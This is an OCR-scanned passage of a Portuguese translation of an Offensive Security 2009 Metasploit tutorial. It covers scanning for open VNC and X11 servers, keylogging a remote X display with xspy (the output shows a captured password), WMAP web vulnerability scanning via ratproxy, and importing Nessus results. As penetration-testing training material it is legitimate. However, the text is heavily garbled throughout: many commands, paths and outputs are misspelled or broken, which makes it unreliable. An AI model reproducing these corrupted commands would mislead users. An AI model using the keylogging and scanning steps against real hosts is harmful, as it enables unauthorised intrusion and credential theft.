fato, uma vez que ao fazer uma pentest, nos deparamos com um sistema na rede de destino com uma instalacio VNC aberto. Enquanto estavamos documentando nossos resultados, eu notei alguma atividade no sistema. Acontece que, alguém tinha encontrado o sistema tao bem! Um usuario n3o autorizado estava vivo e ativo no mesmo sistema ao mesmo tempo. Depois de engajar-se em alguma engenharia social com o intruso, fomos informados pelo usuario que tinha acabado de chegar para o sistema, e foi através dele que eram grandes pedagos de varredura de enderegos IP & procura de sistemas abertos. Isto apenas conduz, 0 fato de que os invasores sio, na verdade procurando ativamente deste fruto pendurado baixo, entdo vocé ignoré-lo por seu préprio risco. Se vocé gostaria de testar este médullo no seu ambiente de laboratério, vocé pode baixar ura versio vulneravel do UltraVNC AQUI. Para utilizar o scanner VNC, primeiro selecione o médulo auxiliar, definir as nossas opgées, em seguida, deixé-lo correr. nsf auxiliary (vnc. nsf auxiliary (vnc jth) > use scanner/vnc/vne_none_auth auth) > show options Nodute options: © Offensive Security 2009 Traduzido por Rafael TorresName Current Setting Required Description HOSTS ldress range or CIDR identifier RPORT 590 yes The target port THREADS 1 yes ‘The nunber of concurrent threads nsf auxiliary(vnc_none_auth) > set RHOSTS 192.168.1.0/24 RHOSTS => 192.168-1.0/24 msf_auxiLiary(vnc_none_auth) > set THREADS 50 THREADS => 50 nsf auxitiary(vnc_none_auth) > run [J 392.168.1.121:5960, WNC server protocol version : RFE (] 192,168,1:321:5909, WIC server security types supported [] Auxiliary module execution completed 8 Wone, free access! Open X11 ‘Muito parecido com o scanner vnc_auth, o scanner digitaliza Open_X11 um intervalo alvo de servidores X11, que permite que um usudrio se conectar sem autenticac3o. Pense no ataque devastador que pode ser efectuado fora desse erro de configuracio. Para operat, mais uma vez, selecione o médulo auxiliar, definir as nossas opsdes, ¢ deixé-lo correr. msf > use scanner/x11/open_x11 msf auxiliary(open_xl1) > show options Module options: Name Current Setting Required Description RHOSTS yes The target address range or CIDR identifier RPORT 6000 yes The target port THREADS 1 yes The number of concurrent threads msf auxiliary(open_x11) > set RHOSTS 192.168.1.1/24 RHOSTS => 192.168.1.1/24 sf auxiliary(open_x11) > set THREADS 50 THREADS => 50 msf auxiliary(open_x11) > run [+] Trying 192,168.1.1 [+] Trying 192.168.1.0 [+] Trying 192.168.1.2 [*] Trying 192.168.1.29 [+] Trying 192,168.1.30 [+] Open X Server @ 192.168.1.23 (The XFree86 Project, Inc) © Offensive Security 2009 Traduzido por Rafael TorresTrying 192.168.1.31 Trying 192,168,1.32 Trying 192,168.1.253 Trying 192,168.1,254 Trying 192.168.1.255 Auxiliary module execution completed ‘Apenas como exemplo do que podemos fazer agora, vamos keylogging instituto remoto. rootebt4:/# cd /pentest/sniffers/xspy/ root@bt4:/pentest/sniffers/xspy# ./xspy -display 192.168.1.101:0 -delay 100 ssh root@192. 168.1. 11(+BackSpace) 37 sup3rs3cr3tp4sSword ifconfig exit WMAP Web Scanner WMAP 6 um scanner de vulnerabilidade feature-rich web que foi originalmente criada a partir de ‘uma ferramenta chamada SQLMap. Esta ferramenta oferece a possibilidade de tomar um proxy € tubo de saida e os dados capturados e realizar andlise de vulnerabilidade fora de um proxy web interceptar. Primeiro, precisamos baixar um proxy que seja compativel com patch e patch do Metasploit. Além disso, observe que se vocé nio tiver feito isso, instale o rubygems e ruby-sqlite3 como esses serdo necessarios. rootebt4: /pentest /expt 1.58. tar.gz 2 /Franework3# wget http: //ratproxy .googlecode..con/Files/ratproxy- +-2009-06-29 21:41:02-~ http: //ratproxy.googlecode.con/files /ratproxy-1.58.tar.gz Resolving ratproxy.googlecode.com... 74.125.93.82 Connecting te. ratproxy.googlecode.com|74.125.93,82| 80... connected. HTTP request sent, awaiting response... 200 OK Length: 168409 (164K) [application/x-gzip] Saving to: "ratproxy- 58.tar.gz" >] 168,409 201K/s in 0.88 2009-86-29 21: (201 KB/s) ~ “ratproxy-1.58.tar.gz' saved (168409/168409] rootgbts: /pentest/exploits/franevork3# tar -zxvf ratproxy-1.58.tar.gz Unpacked rootabt4: /pentest/exploits/franevork3# cd ratproxy rootebt4: /pentest/exploits/franevork3/ratproxy# patch -d . < © Offensive Security 2009 Traduzido por Rafael Torres‘Jpentest/exploits/franework3 /external/ratproxy/ratproxy_wnap diff patching file Makefile patching file ratproxy.c Hunk #8 succeeded at 1785 (offset 9 Lines). Hunk #9 succeeded at 1893 (offset 9 Lines). patching file hetp Hunk #3 succeeded at 660 (offset 8 Lines). rootabt4: /pentest/exploits/franevork3/ratproxy# make Compiled no errors. Agora que temos Ratproxy atualizado e pronto para ir, temos que configurar nosso proxy, a fim de permitir a comunicacio a ser encapsulado através do nosso proxy e, finalmente, a WMAP Metasploit é. Firefox Primeiro, abra e siga os itens do menu Editar, Preferéncias, Avancado, Rede, Configuragées, Configuracao manual de proxy, selecione "Usar este proxy para todos os protocolos" e no campo de proxy HTTP, digite localhost e definir a porta para 8080. ‘Uma vez que este est configurado, vamos publicar uma série de comandos, navegue até 0 local e, finalmente, atacd-lo, Permite acompanhar o proceso e ver o que se parece. Primeiro precisamos configurar e se conectar ao nosso banco de dados. rootebts: /pentest /exploits/franework3# . /xsfconsole lode v5.5-testing [core:3.3 api:1.0] 381 exploits - 251 payloads 20 encoders - 7 nops 156 aux create wnap. db [*] Creating a new database instance. [+] Successfully connected to the [J File: inap.db tabase [+] Successfully connected to the database [+] Files wap. db Em outra janela ou aba terminal, inicie Ratproxy com o registo completo, apontando para 0 nosso banco de dados. rootGbt4: /pentest/ueb/ratproxy# ./ratproxy -v /pentest /exploits/framework3/ -b wnep.db ratproxy version 1.58-beta by Leamtufgoogle.com [1] WARNING: Running with ne ‘friendly’ checks will not work, Please consult the ‘ins specified. Many cross-domain tunentation for advice. [+] Proxy configured successfully. Have fun, and please do not be evil. [+] Accepting connections on port 8080/tcp (local only)... Agora, com tudo funcionando, vamos procurar 0 nosso site de destino. Certifique-se de passar algum tempo a atravessar 0 site e preencher o banco de dados com informacio suficiente para ‘Metasploit para trabalhar. Assim que terminar a navegagao através do site de destino, voltamos & nossa sessiio Metasploit e ver o que temos capturado. © Offensive Security 2009 Traduzido por Rafael Torressf > vmap_targets - ; 10.211.55.140 80 0 [x] Website structure [J 16.211.55.140:80 ssiz0 ROOT_TREE [+] Loaded « Loaded [+] Loaded auxiliary/scanner/http/frontpage login .. [+] Loaded auxitiary/scanner/http/wmap_vhost_scanner .. [+] Loaded auxiliary/scanner/http/smap_cert [+] Loaded auxitiary/scanner/http/version ... [] Loaded auxiliary/scanner/http/frontpage [+] Loaded auxiliary/adnin/http/torcat_manager ... [+] Loaded auxitiary/scanner/http/wmap_verb_auth bypass .. auxiliary/scanner/http/wap_sst = auxiliary/scanner/http/nnap_backup file . auxiliary/scanner/http/ns09_wx webdav_unicode bypass ... sunitlary/scanner /hetp/imap_dir Listing « auxiLiary/scanner/ht tp/wmap_files_ auxiliary/scanner/http/wnap_file_ane_hane_dir auxiliary/scanner/ht tp /snap_brute, auxiliary/scanner /http /wnap_repl auxiliary/scanner/http/smap_dir_we iliary/scanner /http/wnap_dir_see auxiliary/scanner/http/wmap_blind_sql_« analysis completed in 0.863369941711426 seconds. [+] Don sf > wnap_run -© WMAP agora vai usar 0 arquivo de banco de dados que apontam para Ratproxy e criado com Metasploit e comece a atacar 0 site. Isso geralmente leva algum tempo, pois ha uma quantidade significativa de ataques através do WMAP. Note-se que alguns dos cheques nao sao fiaveis e levam muito tempo para ser conclufdo. Para sair de um médulo especifico auxiliar, é sé apertar "c-control" e vai avangar para o préximo médulo auxiliar. Aguarde até que todo o processo terminar e depois comecar com os comandos abaixo, ‘asf > mep_reports ; Tr] Usage! wap. reports [options] sh Display this help. text

wnap_reports -p [*] Id. Created Target (host,port, ssl) 1, Fri Jun 26 08:35:58 +94 9910.21, 55.140, 80,0 (1 Done. © Offensive Security 2009 Traduzido por Rafael Torresasf > wap reports -= 2 Ie REPORT: 20.212.55.140,60.0 Metasploit WMAP Report [Fri Jun 26 08:35:58 +0000 2008] NEB. SERVER WEBDAV: ENAGLED [rd Jun 26 98:36:45 0000 2009] MEB“SERVER OPTIONS: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY. MOVE, COL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH [Fri Jun 26-08:36:15 40000" 2009] Wee. SERVER TYPE! Micromofe-1i5/6-0 ( Povered by ASP.NET ) [er Jun 26 FILE NAME: /sgl/defeult,spx File /agl/default aspx found. (Fri Jun 26 00:39:02 +0000 2008) FILE RESP_cOOE: 200° [Fri aun 26.68/39:€2 10000 20081 DIRECTORY HAME: /Ads/ Directory /Ads/ found. [Fri aun 26 08:3 DIRECTORY NAME: /€ch/ Directory /cch/ found. [erd Jun 26 08:4 DIRECTORY NAME: /Ee0/ Directory /Ee0/ found. [Fri Jun 26 06:3 DIRECTORY NAME: /-private/ Directory /-privatey found. [Eri un 26 08:55:22 +0000 2008] DIRECTORY RESP CODE: N03. {Fei Sun 28 08755:22 40000 2008] DIRECTORY NARET /_vtibin/ Directory /_vti_bin/ found. [Fri Jun 26 08:55:23 2009] DIRECTORY RESP_CODE: 207 [Fri Jun 26 08:55:23 +9090 2009) DIRECTORY NARET /_vti log/ Directory /_vti_log/ found. [Fri Jun 26 08:55:24 2009] DIRECTORY RESP_CODE: 403 [Fri Jun 26 08:55:24 +9090 2009) DIRECTORY NANET /_vtipvt/ Directory /_vti_pvt/ found. [Fri Jun 26 08:55:24 2009] DIRECTORY RESP CODE: 500 [Fri Jun 26 OB:55724 +0000 2009] DIRECTORY ANE: /_vti_tut/ Directory /_vti_txt/ found. [Fri Jun 26 08:55:24 2008] DIRECTORY RESP CODE: 403 [Fri Jun 26 08:55724 +0000 2609] DIRECTORY NANET /_private/ Directory /_private/ found. [Fri Jun 26 08:56:07 2009] DIRECTORY RESP_CODE: 403 [Fri Jun 26 08:56:07 +0090 2009] DIRECTORY NARET /_vtibin/ Directory /_vti_bin/ found. [Fri Jun 26 08:58:12 2009] DIRECTORY RESP_CODE: 403 [Fri Jun 26 08:56:12 +0090 2009] DIRECTORY NARET /_vti log/ Directory /_vti_log/ found. [Fri Jun 26 08:56:12 +0690 2009] DIRECTORY RESP CODE: 403 [Fri Jun 26 OB:56712 +0000 2009] O relatério devolvido a nés nos diz um monte de informagdes sobre a aplicag3o web e possiveis vulnerabilidades de seguranga que foram identificados. Como pentesters, gostariamos de investigar cada descoberta nova ¢ identificar se existem métodos potenciais de ataque, No exemplo, ha dois resultados bons. © primeiro é WebDav onde pode ser capaz de ignorar logins, © outro é 0 método PUT que podem nos permitir colocar cédigo malicioso no site. WMAP é um timo complemento para 0 Metasploit Framework e permite-the, essencialmente, ter um scanner de vulnerabilidade incorporadas ao quadro ja grande em si. Uma coisa a falar sobre WMAP ¢ realmente ainda é um trabalho em andamento. O site que s6 tinha verificado numerosos casos de erro baseado SQL Injection e Cross-Site Scripting que nao identificou. Basta estar atento ao usar isso, e compreender as actuais limitagGes do WMAP. Working with Nessus Nessus é um bem conhecido e popular scanner de vulnerabilidade que é gratuito para uso pessoal, no comercial, que foi langado em 1998 pela Renaurd Deraison e atualmente publicada pela Tenable Network Security. Ha também um spin off do projeto de Nessus 2, nomeado OpenVAS, que é publicado sob a GPL. Utilizando um grande mimero de verificagdes de vulnerabilidade, plugins chamado Nessus, vocé pode identificar um grande mtimero de vulnerablities bem conhecida. Metasploit aceitard vulnerabilidade digitalizar arquivos de resultado de ambos os Nessus e OpenVAS no formato de arquivo NBE. © Offensive Security 2009 Traduzido por Rafael TorresPermite percorrer o proceso. Primeiro, uma varredura completa do Nessus 4: Cooma Fle Help (00828080551 Pu-Newpolcy |] Dele || Expo. | ‘ssh (22Acp) hip (80tep) ‘Soan time = netbios-ssn (139/cp) End time Sat Aug 29 21:09:40 2009 192.168.2.114 ® 192.168.2.115 192.168.2.116 192.168.2117 ‘Sort By CVE View template, Disconnect Apés a conclusio de um scan de vulnerabilidade, vamos salvar os resultados em formato NBE e depois iniciar 0 msfconsole. Em seguida, precisamos criar um novo banco de dados para ler os resultados em arquivo. rootebt4: /pentest /exploits/frameuork3# . /esfeonsole [*] Successfully connected to the database [+] File: /root/.msf3/sqlites.db sf > load db_tracker [HT Successfully loaded plugit nsf > : db_tracker Nos criamos © banco de dados. Em seguida, vamos dar uma olhada no comando ‘help’, que apresenta muitas mais op¢des. © Offensive Security 2009 Traduzido por Rafael TorresDescription Add one or nore hosts to the databe: db_add_note Add a note to host ab_add_port Add @ port to host ab_autapun furtonaticalty exploit everything ab_eonnect Connect £0 an existing database db_ereate Create a brand new database ab_del_host Delete one or more hosts from the database db_del_port Delete one port fron the database ab_destroy Drop an existing database ab_disconnect ‘the current database instance ab_driver Specify, 4 database. driver abchosts List alt'hosts in the database dbLinport_anap_nlog Inport a THC-Anap scan results file (-0 dbinport“nessus_nbe Inport a Nessus scan result file (NBE) dbimport_nessus_xal Inport a Nessus scan result file (NESSUS) db_inport_nnap_xil Inport @ Nmap scan results file (-oX) ab_nnap, Executes nmap and records the output autonatically ab-notes List all notes in the database ab_services List all services in the database ab_vutns. List all vulnerabilities in the database asf > Entio vamos em frente ¢ importar 0 arquivo de resultados NBE emitindo o 'db_import_nessus_nbe comando’ seguido do caminho para o nosso arquivo de resultados. Depois de importar 0 arquivo de resultados, podemos executar o comando ‘db_hosts’ para listar os hosts que esto nos resultados NBE arquivo. msf > db_import_nessus_nbe /root/docs/115_scan.nbe msf > db_hosts [*] Time: Tue Jul 14 17:40:23 -0600 2009 Host: 192.168.1.115 Status: alive 0S: ‘Vemos exatamente o que estévamos esperando para ver. Em seguida, execute o comando ‘db_services ", que ira enumerar todos os servicos que foram detectados em execucao no sistema digitalizado. ast > Cl Tin nane=epnap (*] Time: Tue Jul nane=netbios-ssn [s] Time: Tue Jul nane=aferosoft-ds tt nene=ash T'1 Tame: Tue Jul nane=netbios-ns (*] Time: Tue Jul nane=ntp Tue Jut 1600 2009 Service: host=192.168.1. port=135 proto=tep state: » 1600 2009 Service: host=192.168.1.115 port=139 proto=tep state=up ‘Tue Jul 14 17:40:23 -0600 2009 Service: host=192. 168.1. cp state=up 23 1600 2009 Service: host=192.168.1. as as 23-0600 2009 Service: host=192.168.1.115 port=445 protostep state=up as as aus 23 Service: host=192.168.1. 1600 5 port=123 proto=udp state=up Por tiltimo, eo mais importante, o comando ‘db_vulns' ir listar todas as vulnerabilidades que foram relatadas por Nessus e gravado no arquivo de resultados. © Offensive Security 2009 Traduzido por Rafael Torres